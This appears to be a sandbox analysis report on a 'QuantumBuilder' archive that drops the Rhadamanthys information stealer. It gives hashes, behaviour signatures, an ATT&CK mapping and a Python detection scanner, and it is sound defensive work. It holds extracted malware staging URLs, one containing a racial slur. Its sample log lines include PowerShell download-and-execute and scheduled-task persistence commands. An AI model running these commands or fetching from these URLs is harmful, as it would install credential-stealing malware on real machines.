General

  • Target

    QUANTUMBUILDER.7z

  • Size

    7.6MB

  • Sample

    240608-p4rhzscf95

  • MD5

    7df51d52383286a3aea91c611f28ea21

  • SHA1

    b85bbe7732f5f541a035552713b63d714d74002d

  • SHA256

    14fd87baefddee9626eb957848f13b77b0eeede39fb682b5b979eeea81f5d0c8

  • SHA512

    600a2b1dfd30d8c449825389a88a3fc9302d16146f75da00ee3d203b72735f254907534a014f1b9e15a96552bbf242c98f3a304863b86ea9f351b6d110309148

  • SSDEEP

    196608:Mc76ggGPY7NDlmH8IMV8f7JEvaspO55Gz4UHBKnsjQisxy:/OASDMc8fmyt55teKFZg

Malware Config

Extracted (1)

  • Language: ps1
  • Source: ps1.dropper
  • URLs:

    https://rentry.org/FUCKOFFNIGGA/raw

Extracted (2, deobfuscated)

  • Language: ps1
  • Source: exe.dropper
  • URLs:

    https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar

Targets

    • Target

      QUANTUMBUILDER/QuantumBuilder.exe

    • Size

      7KB

    • MD5

      960d70161f0ac1ddd8093955446bdcbc

    • SHA1

      5943c81939f9b43228e2fe2f65e90c54660ae47f

    • SHA256

      31e6573e37d06a71b3025c0e9ed4901093ed5262bc60bbbdf7ce1ed28ebb021a

    • SHA512

      8f3f6091fb3d09d4cdb0f9540bbbc2de0562dd5bb77c8446db49f274be7b173cbc0aa24206e25838cc6b6c6578440c0ecfd1a17acc94c50ebd014cbe16617c14

    • SSDEEP

      192:+9yqvjp73xsznGjcJr9emxan6mUqlwc6nYZKvkV/9dXq:+9Jv1dOnGjcJrQmxan6m/ec6nYZSkV/2

    • Rhadamanthys

      Rhadamanthys is an information stealer written in C++, first seen in August 2022.

    • Suspicious use of NtCreateUserProcessOtherParentProcess

      A process is created through NtCreateUserProcess with a parent other than the calling process (parent PID spoofing), which breaks the parent/child lineage that process-tree detections rely on.

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Executes dropped EXE

    • Legitimate hosting services abused for malware hosting/C2

      The extracted configs above fetch the next stages from raw endpoints on rentry.org and bitbucket.org.

    • Target

      QUANTUMBUILDER/img/img/index.html

    • Size

      118B

    • MD5

      8ddffaa30cd272bc227aa4512178333d

    • SHA1

      4ad402f07ab5ce9de7bcd0783ffe865e29c82159

    • SHA256

      d377e770b95cc5dfa75da9c7a5cf77a3af68cd2dc59df39bdc911607067a2b87

    • SHA512

      071f19219033b068f35de6ace69e5fbfd2ac219b7ded08ea11e4433431ec036dc6cb4f0068782f0226bb4554afc5bbb4d7db179e6a1e32531df4e8c49d85f279

    Score: 1/10
    • Target

      QUANTUMBUILDER/img/index.html

    • Size

      101B

    • MD5

      9673750fbe393bb5ff81433b566a1919

    • SHA1

      15de2d8eec753e0219922b437fcd89e335d28e2a

    • SHA256

      5ed8096042789c866ded5da853200c75b471dabe6d522a68df1a8f831969e930

    • SHA512

      14f07cf27b8fd93f857880c650d5d0fd607b158dadbf0b06899364448caf149eb92b22ef3a3717f5b401a6b1cffbe9be43bfdf784d359279c36d947add626672

    Score: 1/10
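The signatures above describe a two-hop PowerShell stager (a ps1 dropper pulling from a rentry.org raw endpoint, then an exe dropper pulling an archive from a bitbucket.org raw endpoint) followed by scheduled-task persistence. What follows is an added example, not part of this report and not Triage's own signature engine: a small Python scanner that runs the equivalent checks over PowerShell ScriptBlock (event 4104) and process-creation (event 4688) text and tags each hit with the ATT&CK IDs from the matrix below, plus T1105 for the payload fetch, which the "Downloads MZ/PE file" signature corresponds to but the matrix does not list. The log lines, paste/repository paths, file names and task name are constructed for the example; only the abused host names come from the report.

```python
"""Flag the PowerShell stager chain and persistence seen in this report.

Added example (not from the sandbox report). Scans free-text Windows event
lines and returns structured findings; the chain check at the bottom is the
part worth alerting on, the individual patterns are noisy on their own.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# T1102 Web Service: "raw" endpoints on code-hosting / paste services, the
# shape the report's two stager URLs have. Anchored on host and path shape,
# not on the disposable paths in the report.
RAW_HOSTING = re.compile(
    r"https?://(?:www\.)?(?:"
    r"rentry\.org/[^/\s'\"]+/raw"
    r"|bitbucket\.org/[^/\s'\"]+/[^/\s'\"]+/raw/"
    r"|raw\.githubusercontent\.com/"
    r"|pastebin\.com/raw/"
    r")[^\s'\"]*",
    re.IGNORECASE,
)

# T1059.001: PowerShell download cradles (cmdlets, their aliases, WebClient).
# curl/wget are aliases of Invoke-WebRequest inside PowerShell, so they are
# deliberately not matched on their own here.
CRADLE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer|"
    r"Net\.WebClient|DownloadString|DownloadFile|DownloadData)\b",
    re.IGNORECASE,
)

# Payload types the report shows being fetched: a PE, or the .rar that wraps
# the unpacked stage. Only consulted when a cradle is present on the line.
PAYLOAD_EXT = re.compile(r"\.(?:exe|dll|rar|7z|zip)(?=[\"'\s)]|$)", re.IGNORECASE)

# T1053: scheduled-task creation.
SCHTASKS = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    line_no: int
    technique: str
    detail: str


def scan_line(line_no: int, text: str) -> list[Finding]:
    """Return every finding for one event line (may be empty)."""
    hits: list[Finding] = []
    host = RAW_HOSTING.search(text)
    if host:
        hits.append(Finding(line_no, "T1102", f"raw endpoint on code/paste host: {host.group(0)}"))
    cradle = CRADLE.search(text)
    if cradle:
        hits.append(Finding(line_no, "T1059.001", f"PowerShell download cradle: {cradle.group(0)}"))
        ext = PAYLOAD_EXT.search(text)
        if ext:  # cradle + executable/archive extension on the same line
            hits.append(Finding(line_no, "T1105", f"cradle fetches or writes a payload ({ext.group(0)})"))
    task = SCHTASKS.search(text)
    if task:
        hits.append(Finding(line_no, "T1053", f"scheduled task creation: {task.group(0)}"))
    return hits


def scan(lines) -> list[Finding]:
    """Scan an iterable of event lines; line numbers are 1-based."""
    out: list[Finding] = []
    for n, line in enumerate(lines, 1):
        out.extend(scan_line(n, line))
    return out


def stager_chain(findings) -> bool:
    """True when cradle, web-service host and payload fetch all occurred:
    the conjunction seen in this report, not any one signal alone."""
    seen = {f.technique for f in findings}
    return {"T1059.001", "T1102", "T1105"} <= seen


# Constructed sample events (hosts from the report, everything else made up).
SAMPLE_LOG = [
    "4104 ScriptBlock: $u='https://rentry.org/examplepaste/raw'; iex (irm $u)",
    "4104 ScriptBlock: Invoke-WebRequest -Uri https://bitbucket.org/ws/repo/raw/0123abcd/pancake-unpacked.rar -OutFile $env:TEMP\\p.rar",
    "4688 CommandLine: powershell.exe -c Get-ChildItem C:\\Users",
    "4688 CommandLine: schtasks.exe /create /tn Updater /tr C:\\Users\\Public\\p.exe /sc minute /mo 5",
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"line {f.line_no}: {f.technique} {f.detail}")
    print("stager chain:", stager_chain(found))
```

The per-pattern hits are deliberately broad: a fetch from raw.githubusercontent.com is routine in admin tooling, and `powershell.exe` alone trips the extension regex, which is why the payload check only fires next to a cradle. In production, correlate the three chain signals on ProcessGuid or logon session rather than requiring them on one line, and add the report's file hashes as a separate, exact-match IOC layer.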

MITRE ATT&CK Matrix (ATT&CK v13)

The number after each technique is the count of matched signatures.

Execution

  • Command and Scripting Interpreter (T1059): 1
  • PowerShell (T1059.001): 1
  • Scheduled Task/Job (T1053): 1

Persistence

  • Scheduled Task/Job (T1053): 1

Privilege Escalation

  • Scheduled Task/Job (T1053): 1

Defense Evasion

  • Modify Registry (T1112): 2

Discovery

  • Query Registry (T1012): 4
  • System Information Discovery (T1082): 4
  • Process Discovery (T1057): 1

Command and Control

  • Web Service (T1102): 1